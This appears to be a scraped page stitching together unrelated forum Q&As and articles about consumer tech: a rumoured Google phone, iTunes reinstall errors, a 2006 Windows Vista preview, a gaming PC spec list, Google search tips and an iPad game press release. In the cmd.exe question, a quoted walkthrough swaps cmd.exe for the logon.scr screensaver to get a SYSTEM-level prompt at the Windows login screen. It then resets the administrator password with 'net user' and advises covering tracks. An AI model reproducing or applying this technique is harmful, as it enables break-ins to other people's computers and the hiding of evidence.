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Question by jb: Does anyone know anything about the google phone AKA the google switch?
I can not find very much information on the thing at all.

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Answer by sonoka5
Well this is what they say——-Color us skeptics on this one, but we’ve got a tipster claiming to have the scoop on Google Switch. This version of the mythical Googlephone is said to be the result of a collaboration with Samsung — not Alpha Networks or HTC. Of course, it’s a button-less touchscreen device as is the rage these days only this time with GPS built-in for pinpoint navigation around Google Maps. What’s pictured in that all too familiar blur (Photoshopped?) is the phone’s contact program said to be an extended version of Gtalk combining Gmail, text and instant messaging. According to our tipster, the device doesn’t have any on-board storage. That’s right, all your applications are served up over the network with new apps “attached” to your account via a web interface. So what is it… the real deal or engorged fanboy fantasy? Check the gallery below for biggie pics suitable for dissection.

as for me i have never heard of it before you mentioned it if it really is out there i would get one. wait a couple of days and you should get some more info.

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Lessons from Smeargate: they may not know if you are a dog but they know
P.S. I you have not yet become an active participant in the Foundation for Information Policy Research, the Internet Society, Big Brother Watch or the party political grouping of your choice (e.g. the Conservative Technology Forum or its Labour, UKIP …
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Question by Corbin: In the wake of iTunes ios 5 being a collossal headache, does any one know a version that works today?
Can any one point me in the right direction? I need help finding a version of iTunes that actually works after download. I am so sick of seeing error messages. My computer is a fairly new Dell 560 desktop and is more than capable of handling iTunes so that’s not the problem. The problem is after “successfull downloads” I am getting Error messages every time I try to install iTunes. I have uninstalled all those broken iTune downloads as well as everything that came with it, or anything that said “Apple” for that matter. I used the registry cleaner and all the blah, blah, blah tricks that go with that for ridding your computer of iTunes, after which I tried a fresh new download of iTunes and nuthin’, just stupid error messages saying it couldnt install. What gives?! I am willing to go back to an older version(which I foolishly deleted in anticipation of the new ios 5) But which one works with my type of pc?, I just tried version 9 for win32 and it told me I need a version of win64, I’m pretty sure my computer has both 32 and 64bit versions because I use the 64 google chrome and my girlfriend uses the 32 bit bing web surfers.(if that makes sense). Anyway I use Windows 7 64bit on a dell 560 pc which version of iTunes will work best for me? I cannot keep doing this trial and error method of finding a usable iTunes version because for one thing I am a snails step ahead of dial-up and these downloads use up a lot of expensive MB’s

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Answer by Adam
Version 10+ is fine but will probably want to check this article before you go completely nuts if you are having any trouble!!

http://zardozz.com/zz/2008/04/how-to-completely-uninstall-and-remove-all-traces-of-itunes.html

iTunes can be very difficult to uninstall properly because of a number of registry keys left behind by other pieces of software that it works with that also need to be removed. The article explains what you have to do step by step if you can’t uninstall iTunes using the ADD/REMOVE programs. If you don’t uninstall it properly you can get all sorts of errors when trying to install a new copy… even if you try to write over your existing copy. It saved me hours of aggravation and I did not lose my music!

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Vista is coming soon to a computer near you, are you ready? Unlike past editions of Microsoft Windows this new version seems to be generating a lot more pre-launch buzz. Maybe it has to do with all the new improved browsing and computer features that the Vista will supposedly deliver.

What is Vista?

Vista is the new version of Microsoft Windows, which will offer users a greatly improved browsing and computer experience mainly through more dynamic ‘live’ windows and faster presentation. It will offer a more robust security (direly needed!) and more business features in its corporate OS with encryption, Unix services, and virtual machine capabilities.

You will be able to use different graphical tools to more efficiently manage your information and applications on your desktop. If you read the information on the official Vista site, you may come away believing your desktop will never look or feel the same again. Vista Homepage: http://www.microsoft.com/windowsvista/

There is one underlying reason why this may just be the case. According to the Longhorn Statement of last year, RSS will play a major role in these applications and in the OS itself. Longhorn is the name for the Microsoft Windows Server code. RSS stands for ‘Really Simple Syndication’ and Microsoft should be applauded for bringing RSS to the forefront. Many believe RSS will change the very nature of how we use the Internet and our computers.

Regardless of what it may contain, the new Windows Vista has many consumers delaying the purchase of their next PC or laptop until the new Windows arrives. Many were hoping for a pre-Christmas release but…

When Will It Arrive?

According to Microsoft’s own official site on Vista, Windows Vista will be available in early 2007. However, Vista (as of Sept.22, 2006) is already in Beta testing with over 30,000 testers from around the globe. Read more about this at the Windows Vista Team Blog: http://blogs.technet.com/windowsvista/default.aspx

Vista will have TWO Interfaces

Vista Windows will have two interfaces, Basic and Aero. The Basic Interface will be similar to Windows XP and will run on most current PCs and Laptops. The Aero Interface is more advanced and you will need higher system requirements to take advantage of all the new features. (See Below)

Actually, Vista will have six versions in all. According to the Vista web site these versions will range for the very basic up to the highest performance level.

* Windows Vista Starter which runs only on 32-bit systems and will be so on new machines in India, Thailand and other emerging markets.

* Windows Vista Home Basic which is very comparable to XP Home which will not offer the high-end graphics and media features.

* Windows Vista Home Premium which will offer these graphics and media.

* Windows Vista Business which is similar to the current XP Professional.

* Windows Vista Enterprise will be only available to those customers with volume licenses – will offer Unix service, encryption and virtual machine capabilities.

* Windows Vista Ultimate will combine Vista Enterprise and Vista Home Premium which will give customers the highest version of Windows.

There will also be “N” versions of Vista Business and Vista Home Basic for the European market that will have Window Media Player removed. Microsoft is catering to all levels of the marketplace and its a prudent business move because many current PCs and laptops don’t have the system requirements to take advantage of the highest version of Vista Aero.

Your System Requirements for Vista?

Your system requirements for the new Windows Vista will depend on which version of Vista you’re buying. For the basic Vista you will need a modern processor (800MHz or more) with at least 512 MB of system memory. Your graphics processor should be DirectX 9 capable.

For the fully loaded Vista you will need a little more robust system with at least 1 GHz processor with 1 GB of system memory. This should be supported with DirectX 9 graphics with 128 MB of graphics memory. A premium graphics card like ATI or NVIDIA is recommended and you will need a 40 GB hard drive with 15 GB free space. In order to watch and record live TV you may have to add additional hardware.

Still not sure your current system will support Vista, just run the free Windows Vista Upgrade Advisor RC found here: http://www.microsoft.com/windowsvista/getready/upgradeadvisor/default.mspx

This program will tell you if your system can currently run Vista or if you will need to upgrade your computer.

What noteworthy features will Vista give you?

If we get over the improved features like better organizing of information, better security, and more reliability – what new features will the Vista deliver?

One that really jumps out: INSTANT SEARCH

Instead of using the slow cascading “All Programs”, you can just type in a file name or task and you will find what you’re looking for. The new instant start menu will be a lot quicker, saving you time.

This also jumps out: DYNAMIC WINDOWS

Perhaps, one of the major improvement will be in the appearance and use of the new desktop with transparent ”glass-like” windows and animated windows on the taskbar. It will have live thumbnails on the taskbar, place your mouse over these and you will see the live contents without having to bring it up on your screen. You will also be able to create a three-dimensional stack of open windows on your desktop and you will have smoother performance in dynamic content or windows such as video.

And this one: SPEECH RECOGNITION

Speech Recognition will play a major role in the new Windows Vista which promises to feature all the latest Microsoft speech technologies with ‘unparalleled voice recognition accuracy’ supported with multiple languages and a more human-sounding synthesizer – step aside Stephen Hawkins!

Plus, you will be able to control your computer by using your voice. It will provide you with a list of smart choices, whether it’s selecting a word or choosing an application. Mouseless and hands-free computing tasks — might be worth seeing.

And this: WATCH AND RECORD LIVE TV

You will be able to watch and record live TV with Vista. You may have to use additional hardware to access this feature. It is only a matter of time before the union of the Internet and full TV broadcasting services. Windows Vista may help in furthering this rather slow process. Integration, Integration Integration.

Also this: BETTER SECURITY AND ENCRYPTION

The new Window Vista offers improved security and has a few new encryption programs. There is something called the Windows BitLocker(TM) Drive Encryption which help protect the sensitive data on your hard drive – especially important in our ever increasing mobile lifestyles and workforces. This program will encrypt your entire Windows system and protect your information in the case of a stolen or lost PC or laptop.

Then there is the Encrypting File System (EFS) which will protect user-level files and folders. This is important when two or more people share the same computer as in a company network. Companies will be able to use smart cards with EFS keys to allow employees or workers to access only the content that’s appropriate for them to access. In addition, companies or users will be able to restrict use of USB keys and other removable storage devices, thus hampering the quick removal of data from your computer.

Wildcard: What role will RSS Play?

For interested techies and web watchers, the role RSS will play in the new Vista is an intriguing question. What about all those new RSS applications? The list extensions? What will it bring? Read more here http://blogs.msdn.com/rssteam/

Will RSS (via Vista) be given the means to finally turn the Internet into a Billion Channel Universe? Turning every web site into its own mini-broadcasting system sending out its content to all interested parties. Don’t come to us, we will deliver. Changing static content into dynamic content. Furthermore, will speech recognition turn this dynamic content into a fully interactive hands-free browsing experience. Might give a whole new meaning to the expression ‘Look Ma – no hands!’

All kidding aside, Windows Vista does offer some unique features that will change how we use our computers. It offers greater security and more integrated networking and applications. It does promise to make our desktop interaction more responsive and smoother with ‘live’ social bookmarks and windows. One can only hope Vista lives up to its name and gives us a whole new viewing experience.


The author is a full-time online marketer who runs numerous web sites, including two sites on Internet Marketing. For the latest web marketing tools try: Internet Marketing Tools He also runs an online Laptop Guide and has a keen interest in RSS and Computers. Go here for the latest Gaming Laptops Copyright © 2006 Titus Hoskins. This article may be freely distributed if this resource box stays attached.

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Question by : IS THIS PC ANY GOOD I NEEDD TO KNOW PLEASE? and monitor?
General Spec
Brand
CyberpowerPC
Model
Gamer Ultra 2082
Type
Gaming
Processor
AMD Athlon II X2 260 3.2GHz
Processor Main Features
64 bit Dual Core Processor
Cache Per Processor
2 x 1MB L2 Cache
Memory
4GB DDR3 1333MHz Dual Channel Memory
Hard Drive
1TB SATA-II 3.0Gb/s 7200RPM
Optical Drive 1
24x DVD±R/±RW Dual Layer Drive
Graphics
AMD Radeon HD 6450 (1 GB)
Audio
Sound card – Integrated
Ethernet
Gigabit Ethernet
Power Supply
500W
Keyboard
Xtreme Gear USB Keyboard
Mouse
Xtreme Gear USB Mouse
Operating System
Windows 7 Home Premium 64-bit
Special Features
AZZA Orion Gaming Case
Motherboard
Chipset
NVIDIA GeForce 7025
CPU
CPU Type
Athlon II X2
Installed Qty
1
CPU Speed
260(3.2GHz)
L2 Cache Per CPU
2 x 1MB
CPU Socket Type
AM3
CPU Main Features
64 bit Dual Core Processor
Graphics
GPU/VPU Type
AMD Radeon HD 6450 (1 GB)
Graphics Interface
PCI Express x16
Memory
Memory Capacity
4GB DDR3
Memory Speed
DDR3 1333
Form Factor
DIMM 240-pin
Memory Spec
2GB x 2
Memory Slot (Total)
2
Memory Slot (Available)
0
Hard Drive
HDD Capacity
1TB
HDD Interface
SATA II
HDD RPM
7200rpm
Optical Drive
Optical Drive Type
DVD±RW
Optical Drive Spec
24x DVD±R/±RW Dual Layer Drive
Audio
Audio Chipset
Integrated
Audio Channels
7.1 Channel Audio
Communications
LAN Chipset
Integrated
LAN Speed
10/100/1000Mbps
Front Panel Ports
Front USB
2
Front Audio Ports
Yes
Back Panel Ports
PS/2
2
Rear USB
4
RJ45
1 port
Rear Audio Ports
Yes
Expansion
PCI Slots (Available/Total)
1x PCI-e 16x
1x PCI-e 1x
2x PCI
Mouse
Mouse Type
Xtreme Gear USB Mouse
Keyboard
Keyboard Type
Xtreme Gear USB KeyboardHanns-G
Model
HW-191APB
Cabinet Color
Black
Display
Screen Size
19″
Widescreen
Yes
Maximum Resolution
1440 x 900
Recommended Resolution
1440 x 900
Viewing Angle
150°(H) / 135°(V)
Pixel Pitch
0.283mm x 0.238mm
Display Colors
16.2 Million
Brightness
300 cd/m2
Contrast Ratio
700:1
Response Time
5ms
Panel
Active Matrix, TFT LCD
Display Type
WXGA+
Connectivity
Input Video Compatibility
Analog RGB
Connectors
D-Sub
D-Sub
1
DVI
No
HDMI
No
Power
Complies with
EPA Energy Star
Power Supply
100VAC – 240VAC, 50/60HZ Autodetect
Power Consumption
42W (Max.)
Convenience
Regulatory Approvals
UL, C-UL, TUV, CB, BSMI, FCC, CE, NOM, TCO 03
Stand Adjustments
Tilt
Built-in TV Tuner
No
Built-in Speakers
2 x 1 W
Features
Manufacturer Limited Warranty period (panel): 1 year
Panel Treatment: Anti-glare Hardcoating
VESA Standard Mounting Points
Kensington Lock
Windows Vista
Certified for Windows Vista
Packaging
Package Contents
HW-191APB LCD Monitor
VGA Cable
Power Cable
Audio Cable
Dimensions
Dimensions
17.8″ x 14.6″ x 7.8″
Weight
9.7 lbs.

and i want to know if the monitor will support the system i just want to use the pc for sony vegas and a hdpvr
and does the pc support wifi im looking for one to

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Answer by hong=l
If you are only using this PC to capture and edit gameplay/ other stuff, it should be OK. In my experience Sony Vegas isn’t extremely demanding when it comes to hardware. However, if you are going to be capturing footage for hours at a time and storing a large amount of raw footage and edited video files, you may find that 1 TB fills up pretty soon. You may want to consider purchasing a second 1 TB HDD (around the $ 60 -$ 70ish range) just to be sure. If you decide not to do that, I would definitely have at least a 500 GB second HDD just to backup those edited files.

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Question by banned_glory: Does anyone know some really good advanced “google” searching techniques?
Is there a way to search with a wider range? For example some times I need to search for car parts or things with years and wish I could search a range and not just a specific year e.g. search 1990′s or 199X and not just 1990, 1991, 1992,… etc.

Also, is there is way to exclude certain words from a search?

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Answer by Bob B
You can do some of these things:

* To get rid of a word from the search, just put a “-” before the word. So if you were to search for, say “George Bush -president” it would eliminate results with the word “president” in them (try it- it gives interesting results!)

* You can specify a custom range for pages you search, but for search terms this is difficult, as all Google does is return results that it finds. Searching for something like 199X would be difficult as few searches would line up.

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Question by CaffeineAddict: Is it creepy to “Google” the name of a girl you know?
*By “google” i just mean, to type their name in and search for occurrences.

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Answer by lacrosse9225
no

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Question by Snoopy J: To all who know about cmd.exe-how owuld i do this?
what commands would i replace with the originals listed, if i wanted to delete some files…n stuff

1.) First if you have another account other than the system administrator and you can bring up the Windows command Shell which is cmd.exe then your ready.

2.) To open cmd.exe just click on the Start button and click RUN
type cmd.exe once you’ve done that then your in.

3.) go to the system root directory by typing “cd\” without the quotes, next type “cd\windows\system32\” OR “cd\winnt\system32″
depending on where the Windows [stuff] are located.

4.) once you see system32 at the end of the command line. (warning! here comes the hard part).

5.) start by typing “mkdir tempdir” without the qoutes press enter
next type “copy logon.scr tempdir\logon.scr” also “copy cmd.exe tempdir\cmd.exe” again no quotes, press enter after each line
(type help to understand what you are doing)

6.) next “del logon.scr” deletes original logon.scr

7.) next “rename cmd.exe logon.scr” renames cmd.exe to logon.scr

8.)”exit” quits dos

9.)Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
“net user password”
If the Administrator Account is called Frank and you want the password *SHEET* enter this
“net user Frank SHEET”

10.) and this changes the password on franks machine to *SHEET* and your in.
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

11.) Now log off the machine, logon.scr is the screen saver that will kick in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just to
C:\> net user administrator
and then log in with the new account.
Try this, might work, as long as he didn’t change default permissions on C:\winnt and C:\winnt\system32 you should be golden.

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Answer by corelulos
What exactly is it you are wanting to delete that you can’t do with good old windows explorer?

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Seattle, WA (PRWEB) January 09, 2012

Discovery Bay Games, a leader in app-based game accessories, announced the launch of its new iPad game app, In the Know Duo’. Now available on the App Store, In the Know is compatible with the companys Duo Pop accessory for iPad.

In the Know Duo

Less is more with In the Know, a new trivia game that delivers clues progressively. The fewer clues you need to figure out the answer, the more points you earn. Train your brain in solo mode or play with others using Duo Pop, then share your scores on Facebook and Twitter.

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